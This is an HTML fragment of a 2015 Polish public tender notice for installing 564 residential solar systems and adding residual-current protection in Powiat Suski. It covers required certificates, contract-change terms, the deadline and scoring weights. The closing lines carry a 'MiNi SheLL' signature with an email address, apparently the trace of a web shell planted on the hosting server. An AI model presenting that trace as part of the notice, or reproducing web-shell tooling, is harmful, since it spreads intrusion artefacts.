III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">5.8.1	zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że ofertowane kolektory słoneczne przeszły badania potwierdzające ich pełną zgodność z zakresem normy EN 12975:1 (lub równoważną normą) według metodyki badań ujętej w normie EN 12975:2 (lub równoważnej normie), a zaświadczenie to potwierdza, że:
a) do badań losowo pobierane były urządzenia z linii produkcyjnej w zakładzie producenta,
b) prawidłowość zaświadczenia weryfikowana jest poprzez losowe pobieranie urządzeń do badań na zgodność z normą przez cały okres obowiązywania zaświadczenia.
Zamawiający uzna w tym zakresie w szczególności przedstawienie dla oferowanych kolektorów certyfikatu Solar Keymark lub innego równoważnego certyfikatu, a także jeśli wykonawca w inny sposób udowodni, że stosowane przez niego metody pozwalają na osiągnięcie jakości i niezawodności urządzeń na poziomie co najmniej równym określonemu w niniejszym punkcie.
5.8.2	Dokumenty potwierdzające spełnienie wymagań o których mowa w pkt. I ppkt 3-6,                        określonych z w ZAŁĄCZNIKU Nr 1a do SIWZ Opis przedmiotu zamówienia.
5.8.3	Opis zastosowanych urządzeń i rozwiązań zapobiegających uszkodzeniu instalacji, o których mowa w pkt. I ppkt.25, 29 określonych w ZAŁĄCZNIKU Nr 1a do SIWZ Opis przedmiotu zamówienia.
5.8.4	Pochodzące od producentów urządzeń karty katalogowe lub inne podobne dokumenty potwierdzające zgodność z wymaganiami SIWZ, w tym Opisu przedmiotu zamówienia (załącznik nr 1a do SIWZ) oraz dokumentacji projektowej (załączniki I-III do SIWZ) - dla oferowanych przez Wykonawcę urządzeń wskazanych przez niego w ofercie, według listy określonej w pkt 5 wzoru formularza oferty (załącznik nr 6 do SIWZ).
W zakresie oferowanych kolektorów słonecznych dokumenty te powinny zawierać w szczególności informacje na temat powierzchni aparatury kolektora słonecznego oraz jego mocy (podaje w Watach), przy założeniu G = 1000 W/m2, Tm-Tq = 30K.
5.8.5	Symulację sporządzoną zgodnie z wytycznymi zawartymi w opisie przedmiotu zamówienia - załączniku nr 1a do SIWZ (zgodnie z pkt I.24 i pkt II), wykazującą prognozowaną skalę osiągnięcia Efektu Ekologicznego (zgodnie z pkt I.24 opisu przedmiotu zamówienia) oraz pokrycia zapotrzebowania na ciepłą wodę użytkową (zgodnie z pkt I. 26 opisu przedmiotu zamówienia) uzyskanych dzięki realizacji Inwestycji zgodnie z ofertą Wykonawcy. Symulacja sporządzona dla okresu od 01.01. do 31.12.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi zawierać:
a)	Formularz Ofertowy sporządzony i wypełniony według wzoru stanowiącego Załącznik Nr 6 do SIWZ.
b)	w przypadku powierzania części zamówienia podwykonawcom - informację na temat części zamówienia, której wykonanie wykonawca powierzy podwykonawcom (w punkcie 5 Formularza Ofertowego),
c)	dla części nr 1 - harmonogram rzeczowo-finansowy, sporządzony według wzoru stanowiącego załącznik nr 8 do SIWZ i wypełniony w zakresie kolumn nr I (Lp), II (miejscowość), III (nr domu) i V (zaoferowana cena brutto PLN),
d)	pełnomocnictwo do reprezentowania wykonawcy (wykonawców występujących wspólnie), o ile ofertę składa pełnomocnik,
e)	dokumenty, o których mowa w Rozdziale 5 SIWZ,
f)	wadium (w przypadku wadium wnoszonego w formie innej niż w pieniądzu).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zwiększenie lub zmniejszenie zakresu przedmiotowego Inwestycji
1.	W przypadku gdy Wykonawca przed przystąpieniem do montażu stwierdzi, że projekt budowlany jest nieaktualny z uwagi na zmiany elementów budynku, jest on zobowiązany zgłosić pisemnie ten fakt Zamawiającemu, przedstawiając jednocześnie propozycje rozwiązań zamiennych, o których mowa w § 4.4 ust. 12. Zamawiający w takim przypadku może polecić wykonawcy wykonanie robót zamiennych lub odstąpić od umowy w części dotyczącej wykonania instalacji w danym budynku. Wówczas wynagrodzenie Wykonawcy, o którym mowa w § 10 ust. 1, zostanie obniżone o określoną w harmonogramie rzeczowo-finansowym cenę wykonania instalacji w danym budynku.
Zmiana terminu wykonania prac i inne przypadki zmian umowy
1.	Wykonawca ma prawo do żądania przedłużenia terminu umownego, jeżeli niedotrzymanie pierwotnego terminu umownego nastąpi z powodu okoliczności, nie leżących po stronie Wykonawcy lub z powodu działania siły wyższej. Warunkiem przedłużenia terminu wykonania Inwestycji jest potwierdzenie zaistnienia takiej okoliczności przez Zamawiającego. Zmiana terminu wykonania Inwestycji może nastąpić wyłącznie w drodze aneksu do umowy, pod warunkiem uprzedniego uzyskania przez Zamawiającego pisemnej zgody funduszy finansujących projekt.

2.	Poza innymi przypadkami określonymi w umowie Zamawiający dopuszcza możliwość zmiany umowy w następujących przypadkach:
a)	zmiany terminu realizacji robót wynikających z przyczyn związanych                             z wystąpieniem ponadnormatywnych złych warunków atmosferycznych (np. powódź, mróz poniżej 20 stopni C, przewlekłe obfite opady deszczu lub śniegu, wiatr halny - trwające nieprzerwanie powyżej 5 dni) - o czas trwania tych warunków,
b)	zmiany terminu realizacji robót wynikających z wyniknięcia czynników uniemożliwiających realizację robót, takich jak wykopaliska archeologiczne, niewybuchy, niezinwentaryzowane przez poprzednich użytkowników, instalacje,
c)	zmiany terminu realizacji robót związane z koniecznością oceny zasadności robót zamiennych, w tym powołania do tej oceny biegłych oraz w przypadku wystąpienia innych przeszkód nieprzewidzianych SIWZ, a w szczególności ukrytych błędów w dokumentacji projektowej, 
d)	zmiany terminu realizacji robót związane z koniecznością wykonania robót dodatkowych niezbędnych do realizacji przedmiotu zamówienia lub danej jego części,
e)	zmiany terminu realizacji robót związanych z zaistnieniem siły wyższej,
f)	zmiany w sposobie realizacji części umowy, w tym zmiany sposobu wykonywania robót lub instalacji spowodowane uzasadnionymi przyczynami technicznymi i technologicznymi, w szczególności potwierdzonymi opiniami biegłych i rzeczoznawców, zwłaszcza w sytuacji, gdy dotychczasowe rozwiązania mogłyby stanowić zagrożenie dla życia lub zdrowia przyszłych użytkowników lub obniżałyby funkcjonalność realizowanych instalacji, a także gdy dotychczasowe rozwiązania nie gwarantują osiągnięcia efektów, o których mowa w § 1.1. lit. b) oraz pokrycia zapotrzebowania na ciepłą wodę użytkowa na poziomie min. 50 % w obrębie każdego budynku mieszkalnego w okresie roku kalendarzowego, jeżeli na wykonanie wymienionych zmian Wykonawca uzyskał pisemną zgodę Zamawiającego. W takim przypadku, jeśli będzie to uzasadnione przez zmianę zakresu rzeczowego robót, strony mogą uzgodnić zmianę wysokości wynagrodzenia wykonawcy za wykonanie tej części przedmiotu umowy, proporcjonalnie do kwot wynikających z przedstawionych przez Wykonawcę Tabel Wartości Elementów Scalonych, a w ich braku - według cen rynkowych;
g)	zmiany w sposobie realizacji części umowy, w tym zmiany sposobu wykonywania robót, spowodowane zmianą czynników naturalnych,
h)	konieczność dostarczenia innych niż określone w ofercie Wykonawcy elementów robót lub urządzeń, spowodowana zakończeniem produkcji tych elementów lub wycofaniem ich z obrotu na terytorium Rzeczypospolitej Polskiej. W takim przypadku Wykonawca przedstawi do akceptacji Zamawiającego proponowane do wykonania elementy robót lub urządzenia. Warunkiem akceptacji będzie gwarantowanie przez nie parametrów i efektów nie mniejszych niż wymagane w SIWZ i nie gorszych niż w ofercie wykonawcy, a także braku zwiększenia wysokości wynagrodzenia Wykonawcy,
i)	zmiany zakresu robót, które wykonawca może powierzyć podwykonawcom, jeżeli zapewni to wyższy poziom wykonania robót lub przyspieszenie ich wykonania,
j)	zmiany w strukturze i/lub organizacji Zamawiającego, które maja wpływ na zakres robót wykonawcy,
k)	zmiany domu mieszkalnego, w którym zrealizowana zostanie instalacja, w szczególności w przypadku rezygnacji mieszkańca z realizacji lub jego śmierci i braku zamiaru realizacji instalacji po stronie jego spadkobierców. W takim przypadku Zamawiający przedstawi Wykonawcy do realizacji instalację w innym domu mieszkalnym, wytypowanym z listy rezerwowej. W takim przypadku, jeśli będzie to uzasadnione przez zmianę zakresu rzeczowego robót, strony mogą uzgodnić zmianę wysokości wynagrodzenia wykonawcy za wykonanie tej części przedmiotu umowy, proporcjonalnie do kwot wynikających z przedstawionych przez Wykonawcę Tabel Wartości Elementów Scalonych, a w ich braku - według cen rynkowych,
l)	zmiany wynagrodzenia Wykonawcy w przypadku zmiany urzędowej stawki podatku od towarów i usług (VAT). W takim przypadku zmiana wynagrodzenia będzie dokonana wyłącznie dla części Inwestycji, których realizacja będzie zakończona w okresie obowiązywania zmienionej stawki podatku.

- Zmiana osób pełniących funkcje koordynatora wykonawcy oraz kierowników robót oraz kierowników brygad może nastąpić jedynie z ważnych przyczyn i po uzyskaniu uprzedniej zgody Zamawiającego. Osoby przejmujące te funkcje muszą posiadać kwalifikacje zawodowe  i doświadczenie nie mniejsze niż wymagane w pkt. 4.1.4.1-4.1.4.4. SIWZ
- W przypadku zmiany osoby Koordynatora Projektu ze strony Zamawiającego, Zamawiający niezwłocznie powiadomi o tym Wykonawcę na piśmie.

- innych warunków wyszczególnionych w siwz</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatsuski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, 34-200 Sucha Beskidzka ul. Kościelna 5b pok. 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2015 godzina 10:00, miejsce: w siedzibie Zamawiającego, 34-200 Sucha Beskidzka, ul. Kościelna 5b , Dziennik Podawczy/ sekretariat Wicestarosty.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach realizacji Programu zwiększenia wykorzystania energii i poprawy jakości powietrza w obrębie obszaru NATURA 2000, Powiatu suskiego przy udziale finansowym  Szwajcarsko Polskiego Programu Współpracy, Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Warszawie oraz Mieszkańców Powiatu Suskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wykonanie robót budowlanych polegających na wykonaniu 564 instalacji solarnych dla budynków mieszkalnych na terenie Powiatu Suskiego oraz zdalnego systemu monitoringu instalacji solarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie robót budowlanych polegających na wykonaniu 564 instalacji solarnych dla budynków mieszkalnych na terenie Powiatu Suskiego oraz zdalnego systemu monitoringu instalacji solarnych
szczegółowe informacje w siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.00.00.00-7, 45.33.10.00-6, 45.33.00.00-9, 45.32.10.00-3, 45.31.00.00-3, 09.33.11.00-9, 09.33.20.00-5, 38.55.10.00-2, 38.55.40.00-3, 38.42.11.00-3, 38.12.70.00-1, 32.44.13.00-9, 72.21.10.00-7, 72.25.41.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94</li>
<li>2. pokrycie zapotrzeb.na cwu w skali roku powyżej 60% i pow.aparatury kolektora słonecznego>2,40m2 i moc kolektora min.1700W przy G=1000W/m2,Tm-Tq=30K - 4</li>
<li>3. czas reakcji serwisu - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie robót budowlanych polegających na wykonaniu zabezpieczeń różnicowo-prądowych w istniejących instalacjach solarnych zlokalizowanych w budynkach mieszkalnych na terenie Powiatu Suskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie robót budowlanych polegających na wykonaniu zabezpieczeń różnicowo-prądowych w istniejących instalacjach solarnych zlokalizowanych w budynkach mieszkalnych na terenie Powiatu Suskiego
Szczegółowe informacje w siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.12.00-2, 45.31.11.00-1, 31.21.41.30-9, 31.21.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. skrócenie okresu realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com